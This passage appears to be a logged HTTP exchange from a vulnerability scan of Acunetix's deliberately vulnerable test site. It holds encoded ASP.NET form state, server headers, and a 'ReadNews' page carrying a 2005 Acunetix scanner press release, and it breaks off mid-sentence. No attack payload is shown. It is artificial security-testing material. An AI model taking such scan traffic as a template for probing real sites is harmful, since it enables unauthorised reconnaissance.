IgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web 